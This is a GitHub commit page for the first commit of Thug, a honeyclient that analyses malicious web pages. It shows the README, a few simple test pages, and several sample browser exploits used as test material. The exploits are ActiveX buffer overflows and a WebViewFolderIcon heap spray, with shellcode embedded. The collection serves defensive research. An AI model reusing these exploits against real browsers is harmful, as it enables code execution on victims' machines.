Permalink
Browse files

First commit

  • Loading branch information...
buffer committed May 8, 2011
0 parents commit 82c455dbe44bc1688622a1b606ebac7198b8c2e7
Showing with 38,743 additions and 0 deletions.
  1. +340 −0 COPYING
  2. +36 −0 README
  3. +15 −0 samples/AST/test1.html
  4. +20 −0 samples/AST/test2.html
  5. +23 −0 samples/AST/test3.html
  6. +51 −0 samples/AST/test99.html
  7. +18 −0 samples/exploits/22196.html
  8. +28 −0 samples/exploits/22811_Elazar.html
  9. +67 −0 samples/exploits/2448.html
  10. +47 −0 samples/exploits/2575.html
  11. +47 −0 samples/exploits/2mix.html
  12. +38 −0 samples/exploits/3420.html
  13. BIN samples/exploits/36488084.sc
  14. BIN samples/exploits/39973780.sc
  15. +44 −0 samples/exploits/4042.html
  16. +32 −0 samples/exploits/4043.html
  17. +24 −0 samples/exploits/4148.html
  18. +76 −0 samples/exploits/4149.html
  19. +131 −0 samples/exploits/4158.html
  20. +40 −0 samples/exploits/4226.html
  21. +19 −0 samples/exploits/4230.html
  22. +17 −0 samples/exploits/4237.html
  23. +50 −0 samples/exploits/4250.html
  24. +49 −0 samples/exploits/4351.html
  25. +56 −0 samples/exploits/4420.html
  26. +29 −0 samples/exploits/4427.html
  27. +44 −0 samples/exploits/4594.html
  28. +20 −0 samples/exploits/4613.html
  29. +59 −0 samples/exploits/4663.html
  30. +39 −0 samples/exploits/4829.html
  31. +30 −0 samples/exploits/4869.html
  32. +44 −0 samples/exploits/4874.html
  33. +33 −0 samples/exploits/4875.html
  34. +71 −0 samples/exploits/4894.html
  35. +31 −0 samples/exploits/4903.html
  36. +35 −0 samples/exploits/4909.html
  37. +79 −0 samples/exploits/4918.html
  38. +82 −0 samples/exploits/4932.html
  39. +120 −0 samples/exploits/4967.html
  40. +21 −0 samples/exploits/4974.html
  41. +120 −0 samples/exploits/4979.html
  42. +120 −0 samples/exploits/4982.html
  43. +33 −0 samples/exploits/4986.html
  44. +118 −0 samples/exploits/4987.html
  45. +121 −0 samples/exploits/5025.html
  46. +49 −0 samples/exploits/5043.html
  47. +37 −0 samples/exploits/5045.html
  48. +132 −0 samples/exploits/5049.html
  49. +121 −0 samples/exploits/5051.html
  50. +119 −0 samples/exploits/5052.html
  51. +37 −0 samples/exploits/5153.html
  52. +31 −0 samples/exploits/5188.html
  53. +118 −0 samples/exploits/5190.html
  54. +75 −0 samples/exploits/5193.html
  55. +122 −0 samples/exploits/5205.html
  56. +22 −0 samples/exploits/5217.html
  57. +70 −0 samples/exploits/5225.html
  58. +69 −0 samples/exploits/5264.html
  59. +69 −0 samples/exploits/5271.html
  60. +50 −0 samples/exploits/5272.html
  61. +355 −0 samples/exploits/55875.html
  62. +69 −0 samples/exploits/ARCserve_AddColumn_BoF.html
  63. +101 −0 samples/exploits/AnswerWorks.htm
  64. +15 −0 samples/exploits/BaiduBar.htm
  65. +20 −0 samples/exploits/BitDefender.htm
  66. +33 −0 samples/exploits/CABrightStor.htm
  67. +9 −0 samples/exploits/CVE-2008-1309-Real.html
  68. +11 −0 samples/exploits/Comodo.htm
  69. +64 −0 samples/exploits/ConnectAndEnterRoom.htm
  70. +27 −0 samples/exploits/CreativeSoftAttack.htm
  71. +50 −0 samples/exploits/DLinkMPEG.htm
  72. +18 −0 samples/exploits/DPClient.htm
  73. +20 −0 samples/exploits/DVRHOSTWeb.htm
  74. +25 −0 samples/exploits/DirectShow.htm
  75. +16 −0 samples/exploits/DivX.htm
  76. +142 −0 samples/exploits/Domino.htm
  77. +107 −0 samples/exploits/FileUploader.htm
  78. +62 −0 samples/exploits/GLIEDown2.htm
  79. +19 −0 samples/exploits/GatewayWeblaunch.htm
  80. +15 −0 samples/exploits/GomWeb.htm
  81. +19 −0 samples/exploits/HPInfo_GetRegValue.htm
  82. +29 −0 samples/exploits/HPInfo_LaunchApp.htm
  83. +23 −0 samples/exploits/HPInfo_SetRegValue.htm
  84. +35 −0 samples/exploits/IMWebControl.htm
  85. +29 −0 samples/exploits/JetAudioDownloadFromMusicStore.htm
  86. +9 −0 samples/exploits/Kingsoft.htm
  87. +13 −0 samples/exploits/MacrovisionFlexNet.htm
  88. +59 −0 samples/exploits/MicrosoftWorks7Attack.htm
  89. +113 −0 samples/exploits/Move.htm
  90. +110 −0 samples/exploits/MyspaceUploader.htm
  91. +54 −0 samples/exploits/NCTAudioFile2.htm
  92. +23 −0 samples/exploits/NamoInstaller.htm
  93. +93 −0 samples/exploits/NeoTracePro.htm
  94. +32 −0 samples/exploits/NessusScanCtrl.htm
  95. +58 −0 samples/exploits/OurgameGLWorld.htm
  96. +16 −0 samples/exploits/OurgameGLWorld.html
  97. +57 −0 samples/exploits/PPlayer.htm
  98. +61 −0 samples/exploits/PTZCamPanel.htm
  99. +301 −0 samples/exploits/Pps.html
  100. +108 −0 samples/exploits/QuantumStreaming.htm
  101. +37 −0 samples/exploits/RDSDataSpace.htm
  102. +16 −0 samples/exploits/RediffBolDownloaderAttack.htm
  103. +14 −0 samples/exploits/RegistryPro.htm
  104. +50 −0 samples/exploits/RtspVaPgCtrl.htm
  105. +13 −0 samples/exploits/SSReaderPdg2_LoadPage.htm
  106. +43 −0 samples/exploits/SSReaderPdg2_Register.htm
  107. +11 −0 samples/exploits/SinaDLoader.htm
  108. +24 −0 samples/exploits/SonicWallNetExtenderAddRouteEntry.htm
  109. +32 −0 samples/exploits/StormConfig.htm
  110. +56 −0 samples/exploits/StreamAudioChainCast.htm
  111. +121 −0 samples/exploits/SymantecBackupExec.htm
  112. +54 −0 samples/exploits/Toshiba.htm
  113. +15 −0 samples/exploits/UUSeeUpdate.htm
  114. +23 −0 samples/exploits/UniversalUpload.htm
  115. +37 −0 samples/exploits/VLC.htm
  116. +64 −0 samples/exploits/WMEncProfileManager.htm
  117. +53 −0 samples/exploits/WinZip.htm
  118. +20 −0 samples/exploits/Xupload.htm
  119. +118 −0 samples/exploits/YahooJukebox.htm
  120. +48 −0 samples/exploits/YahooMessengerYVerInfo.htm
  121. +43 −0 samples/exploits/YahooMessengerYwcvwr_GetComponentVersion.htm
  122. +31 −0 samples/exploits/YahooMessengerYwcvwr_server.htm
  123. +33 −0 samples/exploits/ZenturiProgramCheckerAttack.htm
  124. +19 −0 samples/exploits/aol_ampx.html
  125. +1 −0 samples/exploits/bindshell.sc
  126. +23 −0 samples/exploits/domino.html
  127. +34 −0 samples/exploits/gom.html
  128. +32 −0 samples/exploits/hpinfo.html
  129. +36 −0 samples/exploits/hpinfo1.html
  130. +28 −0 samples/exploits/hpinfo2.html
  131. +19 −0 samples/exploits/hpinfo3.html
  132. +27 −0 samples/exploits/hpupdate1.html
  133. +87 −0 samples/exploits/hpupdate2.html
  134. +33 −0 samples/exploits/inner_html_example.html
  135. +168 −0 samples/exploits/intuit.html
  136. +24 −0 samples/exploits/ms09002-mod.html
  137. +10 −0 samples/exploits/msrichtxt.html
  138. +66 −0 samples/exploits/qvod.html
  139. +26 −0 samples/exploits/qvod.js
  140. +52 −0 samples/exploits/qvodctl-2.html
  141. +11 −0 samples/exploits/qvodctl.html
  142. +42 −0 samples/exploits/qvodsrc.html
  143. +87 −0 samples/exploits/realplayer-mod.html
  144. +110 −0 samples/exploits/rgod_imesh.html
  145. +1 −0 samples/exploits/runcalc.sc
  146. +58 −0 samples/exploits/show-283-1.html
  147. +42 −0 samples/exploits/ssreader2.html
  148. +48 −0 samples/exploits/ssreader_0day.html
  149. +42 −0 samples/exploits/ssreader_noplus.html
  150. +15 −0 samples/exploits/storm_URL.htm
  151. +15 −0 samples/exploits/storm_advancedOpen.htm
  152. +15 −0 samples/exploits/storm_backImage.htm
  153. +15 −0 samples/exploits/storm_isDVDPath.htm
  154. +23 −0 samples/exploits/storm_nov10.html
  155. +15 −0 samples/exploits/storm_rawParse.htm
  156. +15 −0 samples/exploits/storm_titleImage.htm
  157. +79 −0 samples/exploits/stormplayer.html
  158. +227 −0 samples/exploits/testEvents.html
  159. +63 −0 samples/exploits/toshiba.html
  160. +100 −0 samples/exploits/xupload-2.html
  161. +22 −0 samples/exploits/xupload.html
  162. +185 −0 src/AST/AST.py
  163. +179 −0 src/AST/JavaScript.tokens
  164. +6,039 −0 src/AST/JavaScriptLexer.py
  165. +15,814 −0 src/AST/JavaScriptParser.py
  166. 0 src/AST/__init__.py
  167. +141 −0 src/ActiveX/ActiveX.py
  168. +213 −0 src/ActiveX/CLSID.py
  169. 0 src/ActiveX/__init__.py
  170. +4 −0 src/ActiveX/modules/AOLAttack.py
  171. +7 −0 src/ActiveX/modules/AcroPDF.py
  172. +22 −0 src/ActiveX/modules/AdodbStream.py
  173. +14 −0 src/ActiveX/modules/AnswerWork.py
  174. +18 −0 src/ActiveX/modules/AnswerWorks.py
  175. +8 −0 src/ActiveX/modules/AolAmpX.py
  176. +9 −0 src/ActiveX/modules/BaiduBar.py
  177. +8 −0 src/ActiveX/modules/BitDefender.py
  178. +8 −0 src/ActiveX/modules/CABrightStor.py
  179. +8 −0 src/ActiveX/modules/CGAgent.py
  180. +7 −0 src/ActiveX/modules/Comodo.py
  181. +8 −0 src/ActiveX/modules/ConnectAndEnterRoom.py
  182. +4 −0 src/ActiveX/modules/CreativeSoftAttack.py
  183. +8 −0 src/ActiveX/modules/DLinkMPEG.py
  184. +9 −0 src/ActiveX/modules/DPClient.py
  185. +8 −0 src/ActiveX/modules/DVRHOSTWeb.py
  186. +7 −0 src/ActiveX/modules/DirectShow.py
  187. +8 −0 src/ActiveX/modules/DivX.py
  188. +19 −0 src/ActiveX/modules/Domino.py
  189. +11 −0 src/ActiveX/modules/EnjoySAP.py
  190. +13 −0 src/ActiveX/modules/FacebookPhotoUploader.py
  191. +9 −0 src/ActiveX/modules/FileUploader.py
  192. +2 −0 src/ActiveX/modules/Flash.py
  193. +7 −0 src/ActiveX/modules/GLIEDown2.py
  194. +10 −0 src/ActiveX/modules/GatewayWeblaunch.py
  195. +8 −0 src/ActiveX/modules/GomWeb.py
  196. +29 −0 src/ActiveX/modules/HPInfo.py
  197. +8 −0 src/ActiveX/modules/ICQToolbar.py
  198. +13 −0 src/ActiveX/modules/IMWebControl.py
  199. +7 −0 src/ActiveX/modules/JetAudioDownloadFromMusicStore.py
  200. +8 −0 src/ActiveX/modules/Kingsoft.py
  201. +10 −0 src/ActiveX/modules/MSRICHTXT.py
  202. +9 −0 src/ActiveX/modules/MSVFP.py
  203. +37 −0 src/ActiveX/modules/MacrovisionFlexNet.py
  204. +28 −0 src/ActiveX/modules/Makefile.py
  205. +4 −0 src/ActiveX/modules/MicrosoftWorks7Attack.py
  206. +34 −0 src/ActiveX/modules/MicrosoftXMLHTTP.py
  207. +8 −0 src/ActiveX/modules/Move.py
  208. +9 −0 src/ActiveX/modules/MyspaceUploader.py
  209. +8 −0 src/ActiveX/modules/NCTAudioFile2.py
  210. +10 −0 src/ActiveX/modules/NamoInstaller.py
  211. +9 −0 src/ActiveX/modules/NeoTracePro.py
  212. +39 −0 src/ActiveX/modules/NessusScanCtrl.py
  213. +13 −0 src/ActiveX/modules/OurgameGLWorld.py
  214. +28 −0 src/ActiveX/modules/PDFAcroPDF.py
  215. +8 −0 src/ActiveX/modules/PDFFtpDownloadFile.py
  216. +9 −0 src/ActiveX/modules/PDFOpenPDF.py
  217. +13 −0 src/ActiveX/modules/PDFSavaAsBMPWMF.py
  218. +8 −0 src/ActiveX/modules/PDFextractPagesToFile.py
  219. +7 −0 src/ActiveX/modules/PDFsavePageAsBitmap.py
  220. +8 −0 src/ActiveX/modules/PDFsetview.py
  221. +18 −0 src/ActiveX/modules/PPlayer.py
  222. +8 −0 src/ActiveX/modules/PTZCamPanel.py
  223. +8 −0 src/ActiveX/modules/QuantumStreaming.py
  224. +9 −0 src/ActiveX/modules/QvodCtrl.py
  225. +7 −0 src/ActiveX/modules/RDSDataSpace.py
  226. +26 −0 src/ActiveX/modules/RealPlayer.py
  227. +4 −0 src/ActiveX/modules/RediffBolDownloaderAttack.py
  228. +14 −0 src/ActiveX/modules/RegistryPro.py
  229. +9 −0 src/ActiveX/modules/RisingScanner.py
  230. +8 −0 src/ActiveX/modules/RtspVaPgCtrl.py
  231. +13 −0 src/ActiveX/modules/SSReaderPdg2.py
  232. +6 −0 src/ActiveX/modules/ShellApplication.py
  233. +5 −0 src/ActiveX/modules/Shockwave.py
  234. +7 −0 src/ActiveX/modules/ShockwaveFlash9.py
  235. +8 −0 src/ActiveX/modules/SinaDLoader.py
  236. +39 −0 src/ActiveX/modules/SnapshotViewer.py
  237. +11 −0 src/ActiveX/modules/SonicWallNetExtenderAddRouteEntry.py
  238. +13 −0 src/ActiveX/modules/Spreadsheet.py
  239. +8 −0 src/ActiveX/modules/StormConfig.py
  240. +8 −0 src/ActiveX/modules/StreamAudioChainCast.py
  241. +41 −0 src/ActiveX/modules/StromMps.py
  242. +23 −0 src/ActiveX/modules/SymantecBackupExec.py
  243. +13 −0 src/ActiveX/modules/Toshiba.py
  244. +7 −0 src/ActiveX/modules/UUSeeUpdate.py
  245. +7 −0 src/ActiveX/modules/UniversalUpload.py
  246. +18 −0 src/ActiveX/modules/VLC.py
  247. +8 −0 src/ActiveX/modules/WMEncProfileManager.py
  248. +11 −0 src/ActiveX/modules/WebViewFolderIcon.py
  249. +8 −0 src/ActiveX/modules/WinZip.py
  250. +13 −0 src/ActiveX/modules/XUpload.py
  251. +18 −0 src/ActiveX/modules/YahooJukebox.py
  252. +6 −0 src/ActiveX/modules/YahooMessengerCyft.py
  253. +13 −0 src/ActiveX/modules/YahooMessengerYVerInfo.py
  254. +26 −0 src/ActiveX/modules/YahooMessengerYwcvwr.py
  255. +12 −0 src/ActiveX/modules/ZenturiProgramCheckerAttack.py
  256. +97 −0 src/DOM/DFT.py
  257. +82 −0 src/DOM/History.py
  258. +77 −0 src/DOM/Location.py
  259. +221 −0 src/DOM/Navigator.py
  260. +84 −0 src/DOM/Personality.py
  261. +66 −0 src/DOM/Plugins.py
  262. +86 −0 src/DOM/Screen.py
  263. +861 −0 src/DOM/Window.py
  264. 0 src/DOM/__init__.py
  265. +1,551 −0 src/DOM/w3c.py
  266. +72 −0 src/Debugger/Debugger.py
  267. +25 −0 src/Debugger/Global.py
  268. +71 −0 src/Debugger/Shellcode.py
  269. 0 src/Debugger/__init__.py
  270. +2,798 −0 src/Debugger/d8.js
  271. +249 −0 src/PDF/PDFAnalyzer.py
  272. 0 src/PDF/__init__.py
  273. +27 −0 src/thug.py
340 COPYING

Large diffs are not rendered by default.

Oops, something went wrong.
36 README
@@ -0,0 +1,36 @@
+
+Thug
+====
+
+
+Requirements
+============
+
+- Python 2.5 or later
+ http://www.python.org/
+- Google V8
+ http://code.google.com/p/v8/
+- PyV8
+ http://code.google.com/p/pyv8/
+- Libemu
+ http://libemu.carnivore.it/
+- Pylibemu
+ https://github.com/buffer/pylibemu
+
+
+Installation
+============
+
+
+Usage
+=====
+
+
+License information
+===================
+
+Copyright (C) 2011 Angelo Dell'Aera <buffer@antifork.org>
+
+License: GNU Lesser General Public License, version 3 or later; see COPYING.txt
+ included in this archive for details.
+
@@ -0,0 +1,15 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+var s = "foo";
+var i = 10;
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
@@ -0,0 +1,20 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
@@ -0,0 +1,23 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 0;
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+</body>
+</html>
@@ -0,0 +1,51 @@
+<html>
+<head>
+
+<title>onload test</title>
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+ var j = 0;
+ var ar = Array('a', 'b', 'c');
+ s += "bar";
+ i = i - 6;
+
+ if (i > 100) {
+ alert("Mmmmh");
+ }
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+
+ do {
+ s += "b";
+ j += 2;
+ i--;
+ } while (i > 1);
+
+ while (t > 0) {
+ s += "c";
+ t--;
+ }
+
+ for (a in ar) {
+ alert(a);
+ }
+
+ alert(s);
+ return 0;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>The load event fires when the document has finished loading!</p>
+</body>
+</html>
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title> PoC 79 Exe's / IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w By InTeL </title>
+<!-- via http://downloads.securityfocus.com/vulnerabilities/exploits/22196.c -->
+</head>
+
+<body>
+<object classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" id="pwnage">
+</object>
+<script>
+
+pwnage.SetFormatLikeSample("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^Êÿ|ëYëèøÿÿÿIIIIIIIIIIIIIIIIIQZ7jJXP0B1ABkBAZB2BA2AA0AAX8BBPuzIYlm81T7pePUPLKG55lLKQlC5RXs1jOLKBoUHnkaOQ0TAzKsyLKUdNkwqZN4qiPLYnLK4o044VgjajjFmdAO2ZKl4Uk1D4dFd0uKUNkaOEtEQzKpfnkvlbkNkSo5LuQjKNkeLnkVaXkk9QLDdc4iS7AIPu4nkQPDpk5YPrXdLNkaPflNkPpELnMLKCXwxjKEYlKmPLpS0S0uPLK3XElcofQHvu0QFlIL8ncO0akRpbHXoxNm0u0bHNxinNjDNpWkOKWU3rAPl0cFNCUT8e5C0J")
+
+</script>
+</html>
+</body>
+
+
@@ -0,0 +1,28 @@
+<!--
+written by e.b.
+-->
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+
+ while (s.length < 999999) s=s+s;
+
+ var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
+
+
+ obj.Import(s);
+ obj.PlayerProperty(s);
+
+
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();">
+
+ </body>
+</html>
+
+
@@ -0,0 +1,67 @@
+<!--
+
+..::[ jamikazu presents ]::..
+
+Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
+Works on all Windows XP versions including SP2
+
+Author: jamikazu
+Mail: jamikazu@gmail.com
+
+Bug discovered by Computer H D Moore (http://www.metasploit.com)
+
+Credit: metasploit, SkyLined
+
+invokes calc.exe if successful
+
+-->
+
+<HTML>
+<BODY>
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+ var payLoadCode = unescape(
+ "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
+ "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
+ "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
+ "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
+ "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
+ "%uFF57%u63E7%u6C61%u0063");
+ var heapBlockSize = 0x400000;
+ var payLoadSize = payLoadCode.length * 2;
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+ var spraySlide = unescape("%u0505%u0505");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+
+ for ( i = 0 ; i < 128 ; i++)
+ {
+ try{
+ var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
+ tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
+ }catch(e){}
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ }
+
+</SCRIPT>
+
+</BODY>
+</HTML>
+
+
@@ -0,0 +1,47 @@
+<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
+
+<SCRIPT language="JavaScript">
+var expires = new Date();
+expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
+var set_cookie = document.cookie.indexOf("3Ware=");
+if (set_cookie == -1){document.cookie = "3Ware=1;expires=" + expires.toGMTString();
+document.write('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
+var helloworld2Address = 0x0c0c0c0c;
